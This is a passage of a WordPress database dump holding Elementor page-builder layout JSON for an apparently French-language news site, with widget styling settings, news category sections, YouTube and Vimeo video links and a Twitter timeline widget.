":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3061,919,'_elementor_version','0.4'),(3062,919,'_elementor_css','a:3:{s:4:\"time\";i:1511251947;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3064,920,'_elementor_edit_mode','builder'),(3065,920,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":